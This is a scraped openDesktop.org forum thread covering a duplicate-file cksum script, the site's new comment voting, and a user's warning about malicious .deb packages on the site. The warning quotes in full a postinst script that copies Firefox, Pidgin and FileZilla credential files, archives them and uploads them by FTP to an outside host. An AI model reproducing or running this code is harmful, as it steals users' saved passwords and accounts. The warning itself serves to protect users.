-
 KDE-Apps.org Applications for the KDE-Desktop 
 GTK-Apps.org Applications using the GTK Toolkit 
 GnomeFiles.org Applications for GNOME 
 MeeGo-Central.org Applications for MeeGo 
 CLI-Apps.org Command Line Applications 
 Qt-Apps.org Free Qt Applications 
 Qt-Prop.org Proprietary Qt Applications 
 Maemo-Apps.org Applications for the Maemo Plattform 
 Java-Apps.org Free Java Applications 
 eyeOS-Apps.org Free eyeOS Applications 
 Wine-Apps.org Wine Applications 
 Server-Apps.org Server Applications 
 apps.ownCloud.com ownCloud Applications 
--
-
 KDE-Look.org Artwork for the KDE-Desktop 
 GNOME-Look.org Artwork for the GNOME-Desktop 
 Xfce-Look.org Artwork for the Xfce-Desktop 
 Box-Look.org Artwork for your Windowmanager 
 E17-Stuff.org Artwork for Enlightenment 
 Beryl-Themes.org Artwork for the Beryl Windowmanager 
 Compiz-Themes.org Artwork for the Compiz Windowmanager 
 EDE-Look.org Themes for your EDE Desktop 
--
-
 Debian-Art.org Stuff for Debian 
 Gentoo-Art.org Artwork for Gentoo Linux 
 SUSE-Art.org Artwork for openSUSE 
 Ubuntu-Art.org Artwork for Ubuntu 
 Kubuntu-Art.org Artwork for Kubuntu 
 LinuxMint-Art.org Artwork for Linux Mint 
 Arch-Stuff.org Art And Stuff for Arch Linux 
 Frugalware-Art.org Themes for Frugalware 
 Fedora-Art.org Artwork for Fedora Linux 
 Mandriva-Art.org Artwork for Mandriva Linux 
--
-
 KDE-Files.org Files for KDE Applications 
 OpenTemplate.org Documents for OpenOffice.org
 GIMPStuff.org Files for GIMP
 InkscapeStuff.org Files for Inkscape
 ScribusStuff.org Files for Scribus
 BlenderStuff.org Textures and Objects for Blender
 VLC-Addons.org Themes and Extensions for VLC
--
-
 KDE-Help.org Support for your KDE Desktop 
 GNOME-Help.org Support for your GNOME Desktop 
 Xfce-Help.org Support for your Xfce Desktop 
--
openDesktop.orgopenDesktop.org:   Applications   Artwork   Linux Distributions   Documents    Linux42.org    OpenSkillz.com   
 
Home
Apps
Artwork
News
Groups
Knowledge
Events
Forum
People
Jobs
Register
Login

-
- global .- user support .- artwork .- developer . 
goto page: prev   1  2  3  4 

-

 Search OTS Files?

 
 by nleric on: May 1 2010
 
Score 50%

Hi,
I use DJ Software called OTSDJ, the mp3's are converted into .OTS, is there any programme I can use to search all my .OTS files for duplicates?
Thanks,
Noel


Reply to this

-
.

 dj

 
 by nk5 on: Jul 27 2010
 
Score 50%
nk5nk5
The Group

write a perl script.


nk5
Reply to this

-

 Try this

 
 by RaBones on: Aug 11 2010
 
Score 63%

#!/bin/bash
# Generates a report of cksums of files indicating which are duplicates.
#
# Usage: pgm directory
#
PATH="/bin:/usr/bin:/usr/local/bin:$HOME/bin"

DIR="${1:-$(pwd)}" ; test -d "$DIR" || DIR="$(dirname "$DIR")"
cd "$DIR"
pwd
find "$DIR" -type f -exec cksum {} \; -prune 2>/dev/null | sort -n |
awk 'BEGIN { PRV=0; NDUPS=0 } { DIF=$1-PRV;
if (DIF == 0) { BANR="DUPL"; NDUPS++; } else { BANR=":"}
if (NR == 1) { BANR="FIRST"; }
printf "%-5s:\t%11d %9d\t%s\n", BANR,$1,$2,$3; PRV=$1; }
END { printf "Dups/Recs: %d/%d\n", NDUPS, NR; }'

#[end]


Reply to this

-

 the comment

 
 by MargieMoran on: Sep 9 2010
 
Score 63%

this was great blog! keep it up!


custom research papers.
Reply to this

-
.

 what are the comment-ratings?

 
 by Padster on: Sep 17 2010
 
Score 79%

i noticed today that there are now little ratings beside comments. what are these, and how do you "vote" (it says 1 votes, etc)

what is this new thing?


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

Reply to this

-
.

 Re: what are the comment-ratings?

 
 by Frank on: Sep 17 2010
 
Score 75%
FrankFrank
KDE
editor
Home

if you hover over the bar plus and minus buttons appear to vote. Every use can only vote once. The idea is that you can quickly see which comments are good and useful and which comments are only from trolls.
I will add a feature soon that comments with a score below a specific value are automatically deleted.

I will port this new voting system to the content voting soon if people like it.

What do you think?


Frank Karlitschek
Reply to this

-

 Re: Re: what are the comment-ratings?

 
 by Padster on: Sep 18 2010
 
Score 63%

oh, now they have buttons under them. they weren't there for me before.

about this new idea. it's kind of nice, but i don't think i'd go as far as to delete the comments, and especially not deleting someone's content. maybe it automatically hides it (like youtube's marking as spam or whatever). that would be good. it's kind of a good idea for comments, but i don't think i'd use it for content.


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

Reply to this

-

 Re: Re: what are the comment-ratings?

 
 by Perberos on: Sep 21 2010
 
Score 50%
PerberosPerberos
Matsusoft / Ugamela
Home

punishment exists? (like hidding the comment)


Payme the english school, pl00x :3
Reply to this

-
.

 Re: Re: what are the comment-ratings?

 
 by Padster on: Sep 21 2010
 
Score 50%

i find the vote buttons don't always show up. also, i noticed you implemented it in the content part. so what did you decide about auto-deleting or what happens if something has a bad score?


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

Reply to this

-
.

 Re: Re: Re: what are the comment-ratings?

 
 by Frank on: Sep 24 2010
 
Score 38%
FrankFrank
KDE
editor
Home

The comment button shouldalways be visible. Can you send me a link where it is not visible?

If the score of a comment drops below 20% the comment is deleted automatically.

Also every user has a score which is the score of his/her comments, uploads, news and knowledge base entries combined. This score will soon be visible.


Frank Karlitschek
Reply to this

-
.

 Re: Re: Re: Re: what are the comment-ratings?

 
 by Padster on: Sep 24 2010
 
Score 50%

well, i think it might just be my internet or crappy computer. on my good pc it works fine, but sometimes it won't show on my crappy one. i'm on it now, and they are showing, so that's good.
okay, i guess 20% is a good number for comments, and the user-score sounds like a good idea.


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

Reply to this

-

 Re: Re: Re: Re: what are the comment-ratings?

 
 by thinkmaster on: Mar 24 2013
 
Score 50%

And what about locked voting on a comment?

After a while, lets's say three years, the thread should autoclose and push fresh material upwards. Instead of that, I still managed to vote and post.

Regards, Jože


Reply to this

-
.

 Re: Re: what are the comment-ratings?

 
 by ariszlo on: Dec 15 2010
 
Score 50%

> The idea is that you can quickly see which comments are good and useful and which comments are only from trolls.

Do you mean that unpopular comments are necessarily bad? That is fallacious.

A comment pointing out a possible license violation may help to avoid legal troubles, nevertheless, it may be voted down by visitors who love the legally disputable contribution as it has just happened here:
http://gnome-look.org/content/show.php?content=113264


Ariszló
Reply to this

-
.

 Dangerous .debs

 
 by ariszlo on: Dec 15 2010
 
Score 50%

Somebody is distributing .deb packages with malicious postinst files.

Do not install .debs downloaded from here without first looking into them with File Archiver.

The person keeps changing their login name, which is Jeffery5 at the moment.

The postinst files contain the following code:

#!/bin/sh
cd /etc/

rm -f accounts.xml sitemanager.xml key3.db signons*

cp /home/*/.purple/accounts.xml /etc/
cp /home/*/.filezilla/sitemanager.xml /etc/
cd /home/*/.mozilla/firefox/*.default/
cp key3.db signons* /etc/
cd /etc/

tar -zcf $$.tar.gz key3.db signons* accounts.xml sitemanager.xml

echo "ftp -n ftp.filehive.megabyet.net << EOT
ascii
user slave@filehive.megabyet.net cookiemonster
put $$.tar.gz
close
bye" >/etc/Gate.sh

chmod 777 Gate.sh
chmod +x Gate.sh

/etc/Gate.sh&
sleep 3
wget -q http://filehive.megabyet.net/index.php&

exit


Ariszló
Reply to this

-

 Re: Dangerous .debs

 
 by Padster on: Dec 16 2010
 
Score 50%

i'm guessing that it reports some of your account information to this guy. yeah, i wouldn't want that. thx for the tip :)


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

Reply to this

-

 Re: Re: Dangerous .debs

 
 by ariszlo on: Dec 19 2010
 
Score 50%

They are back calling themselves Morphine5.


Ariszló
Reply to this

-
.

 Re: Re: Re: Dangerous .debs

 
 by Padster on: Dec 19 2010
 
Score 50%

:/


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

Reply to this

-

 Re: Dangerous .debs

 
 by Frank on: Dec 20 2010
 
Score 50%
FrankFrank
KDE
editor
Home

Please report bad packages to my or any other admin so we can delete them quickly.

Thanks.


Frank Karlitschek
Reply to this

goto page: prev   1  2  3  4 

Add commentAdd comment



-



 
 
 Who we are
Contact
More about us
Frequently Asked Questions
Register
Twitter
Blog
Explore
Apps
Artwork
Jobs
Knowledge
Events
People
Updates on identi.ca
Updates on Twitter
Content RSS   
Events RSS   

Participate
Groups
Forum
Add Content
Public API
About openDesktop.org
Legal Notice
Spreadshirt Shop
CafePress Shop
Advertising
Sponsor us
Report Abuse
 

Copyright 2007-2016 openDesktop.org Team  
All rights reserved. openDesktop.org is not liable for any content or goods on this site.
All contributors are responsible for the lawfulness of their uploads.
openDesktop is a trademark of the openDesktop.org Team